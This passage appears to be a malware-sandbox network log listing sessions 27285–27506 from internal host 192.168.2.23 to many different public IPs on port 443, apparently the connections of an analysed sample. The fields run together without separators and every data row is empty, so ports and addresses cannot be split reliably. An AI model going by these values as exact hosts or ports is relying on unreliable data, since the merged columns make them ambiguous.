                                          27285192.168.2.23506285.66.114.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27286192.168.2.234304241.90.49.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27287192.168.2.2338088121.130.20.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27288192.168.2.234590691.30.219.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27289192.168.2.2341280142.225.11.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27290192.168.2.234460238.143.44.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27291192.168.2.2354358219.130.180.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27292192.168.2.2348546122.160.209.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27293192.168.2.2356470160.248.229.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27294192.168.2.2333598131.234.234.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27295192.168.2.2333322150.49.88.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27296192.168.2.233609445.61.36.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27297192.168.2.2341090185.182.77.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27298192.168.2.235777847.212.145.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27299192.168.2.2340610190.246.85.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27300192.168.2.234194040.23.234.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27301192.168.2.233524685.118.211.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27302192.168.2.2354290156.126.215.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27303192.168.2.2358744182.147.49.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27304192.168.2.2360004177.49.33.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27305192.168.2.235616050.70.247.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27306192.168.2.2348370163.174.204.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27307192.168.2.236061284.169.17.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27308192.168.2.233870676.116.199.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27309192.168.2.2338726133.7.175.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27310192.168.2.2353054194.95.250.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27311192.168.2.2335596117.75.55.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27312192.168.2.2355176171.0.178.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27313192.168.2.2337898140.37.167.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27314192.168.2.2350982161.222.204.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27315192.168.2.2344646112.234.15.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27316192.168.2.235513686.228.172.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27317192.168.2.234697476.72.124.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27318192.168.2.235239641.182.94.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27319192.168.2.233421862.88.105.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27320192.168.2.235697641.48.218.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27321192.168.2.2351960174.147.117.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27322192.168.2.2343748197.229.210.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27323192.168.2.2348176190.83.220.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27324192.168.2.2340522171.147.155.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27325192.168.2.2342694165.35.30.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27326192.168.2.2356714187.238.231.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27327192.168.2.2360896172.132.113.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27328192.168.2.2359626183.95.83.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27329192.168.2.2340576111.232.241.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27330192.168.2.2333050110.146.16.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27331192.168.2.2345002193.0.209.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27332192.168.2.234109494.0.236.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27333192.168.2.234497045.19.20.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27334192.168.2.235117690.99.243.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27335192.168.2.2339342155.120.162.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27336192.168.2.233344283.77.196.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27337192.168.2.235566034.171.122.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27338192.168.2.2357882118.12.16.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27339192.168.2.235767492.34.16.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27340192.168.2.2346030139.201.173.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27341192.168.2.2333070110.44.22.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27342192.168.2.2351688132.197.224.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27343192.168.2.234949678.68.255.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27344192.168.2.2355824186.30.169.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27345192.168.2.2341322141.252.56.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27346192.168.2.2338278160.65.134.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27347192.168.2.235884299.86.148.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27348192.168.2.233343641.248.61.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27349192.168.2.235463054.109.2.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27350192.168.2.234307641.95.151.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27351192.168.2.234629649.1.185.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27352192.168.2.2335390130.48.24.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27353192.168.2.2333756223.178.107.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27354192.168.2.234880447.90.10.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27355192.168.2.2349908171.49.18.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27356192.168.2.2339726151.153.223.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27357192.168.2.2356828193.174.30.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27358192.168.2.2351116204.218.241.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27359192.168.2.2345060101.67.242.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27360192.168.2.236004445.106.96.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27361192.168.2.235813835.34.240.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27362192.168.2.235556089.208.81.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27363192.168.2.235267477.207.244.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27364192.168.2.2336416171.200.126.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27365192.168.2.234382476.174.178.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27366192.168.2.2351982182.41.190.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27367192.168.2.2339198133.157.163.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27368192.168.2.2333106133.82.52.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27369192.168.2.2349552180.115.20.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27370192.168.2.234805683.129.206.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27371192.168.2.2340850212.211.157.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27372192.168.2.234893047.207.232.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27373192.168.2.235499462.77.122.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27374192.168.2.2333024113.174.206.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27375192.168.2.235751084.99.116.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27376192.168.2.235570032.15.161.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27377192.168.2.2360226167.124.120.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27378192.168.2.235809091.171.230.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27379192.168.2.2340450124.54.35.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27380192.168.2.235236831.145.249.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27381192.168.2.2346840191.130.225.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27382192.168.2.2336988204.71.236.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27383192.168.2.2346100132.188.88.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27384192.168.2.2333304121.17.81.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27385192.168.2.2353682122.18.45.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27386192.168.2.233445097.44.246.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27387192.168.2.2351438216.228.178.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27388192.168.2.2360036120.44.108.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27389192.168.2.2351270198.90.170.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27390192.168.2.234249494.236.242.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27391192.168.2.233609693.205.30.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27392192.168.2.2337410204.87.241.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27393192.168.2.2337864116.176.162.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27394192.168.2.234022841.214.38.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27395192.168.2.2339070186.121.239.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27396192.168.2.234928094.209.239.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27397192.168.2.2357180158.170.143.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27398192.168.2.2349504140.209.77.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27399192.168.2.2335210165.87.9.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27400192.168.2.2336224101.12.148.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27401192.168.2.2360566154.207.104.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27402192.168.2.2345774221.89.18.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27403192.168.2.233888278.24.33.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27404192.168.2.235171288.116.220.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27405192.168.2.235172238.51.61.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27406192.168.2.233586088.112.165.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27407192.168.2.2355330101.48.106.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27408192.168.2.2350166150.4.53.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27409192.168.2.233866853.65.28.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27410192.168.2.234941899.197.42.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27411192.168.2.2355802101.133.72.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27412192.168.2.234230294.189.110.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27413192.168.2.234212818.251.155.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27414192.168.2.235490440.201.193.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27415192.168.2.2332958167.86.79.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27416192.168.2.2346362150.135.181.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27417192.168.2.2345958111.186.176.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27418192.168.2.2343710141.105.255.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27419192.168.2.2349268164.39.115.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27420192.168.2.233824052.50.115.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27421192.168.2.2338846141.82.159.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27422192.168.2.2334308108.183.83.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27423192.168.2.235933482.61.253.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27424192.168.2.2357072147.234.227.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27425192.168.2.23439021.245.156.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27426192.168.2.2341494178.106.246.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27427192.168.2.2356986126.27.183.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27428192.168.2.2350044128.185.19.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27429192.168.2.234360260.68.69.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27430192.168.2.2335174172.13.102.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27431192.168.2.2340382138.124.44.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27432192.168.2.235570825.192.247.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27433192.168.2.2340044117.69.52.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27434192.168.2.233405825.255.74.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27435192.168.2.2351380135.119.190.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27436192.168.2.2334386161.103.4.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27437192.168.2.235041688.187.109.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27438192.168.2.2351414185.83.219.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27439192.168.2.235980296.31.207.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27440192.168.2.2359508145.225.221.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27441192.168.2.23565508.103.241.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27442192.168.2.2353736144.120.193.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27443192.168.2.2348536169.198.207.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27444192.168.2.2342910207.161.23.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27445192.168.2.2353066188.160.212.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27446192.168.2.235041490.129.250.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27447192.168.2.2356780186.219.105.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27448192.168.2.2354712193.90.5.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27449192.168.2.235160283.166.72.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27450192.168.2.235724074.205.218.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27451192.168.2.235870075.207.181.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27452192.168.2.233602451.62.66.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27453192.168.2.2343234166.230.155.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27454192.168.2.233622098.62.137.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27455192.168.2.236036890.134.143.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27456192.168.2.2350868166.39.204.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27457192.168.2.235688238.6.146.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27458192.168.2.2346600188.138.7.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27459192.168.2.2337782111.115.131.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27460192.168.2.235717839.74.167.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27461192.168.2.235401298.245.3.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27462192.168.2.2345682213.215.74.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27463192.168.2.2350688174.138.193.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27464192.168.2.2341610122.142.130.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27465192.168.2.2339940196.174.16.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27466192.168.2.2336842217.84.241.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27467192.168.2.233369076.85.198.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27468192.168.2.234614092.102.120.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27469192.168.2.2359072173.43.48.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27470192.168.2.234935871.34.208.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27471192.168.2.2357486216.162.77.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27472192.168.2.2351478144.28.202.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27473192.168.2.2349342126.209.168.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27474192.168.2.2346208184.137.134.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27475192.168.2.2356492194.11.223.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27476192.168.2.2335022204.158.141.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27477192.168.2.2340328162.13.54.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27478192.168.2.235604845.68.81.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27479192.168.2.2355098124.178.112.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27480192.168.2.2335656120.109.69.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27481192.168.2.233899212.61.216.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27482192.168.2.235009252.223.90.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27483192.168.2.2343654212.172.82.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27484192.168.2.2357658217.162.120.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27485192.168.2.2358022132.225.220.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27486192.168.2.234367454.247.6.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27487192.168.2.2350448185.58.32.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27488192.168.2.234363873.117.250.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27489192.168.2.234015088.123.221.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27490192.168.2.235870831.210.172.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27491192.168.2.2340492114.152.150.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27492192.168.2.235682271.57.205.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27493192.168.2.234581871.208.250.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27494192.168.2.235911647.195.158.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27495192.168.2.233975089.24.149.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27496192.168.2.2335148130.205.103.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27497192.168.2.2350488144.246.93.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27498192.168.2.2360810212.49.239.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27499192.168.2.2350662190.102.193.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27500192.168.2.2359498103.74.121.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27501192.168.2.2337572186.158.142.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27502192.168.2.2338928205.84.229.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27503192.168.2.2349150201.6.148.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27504192.168.2.234730075.109.251.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27505192.168.2.2355996205.250.191.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27506192.168.2.2357000167.179.66.134443
                                          TimestampBytes transferredDirectionData


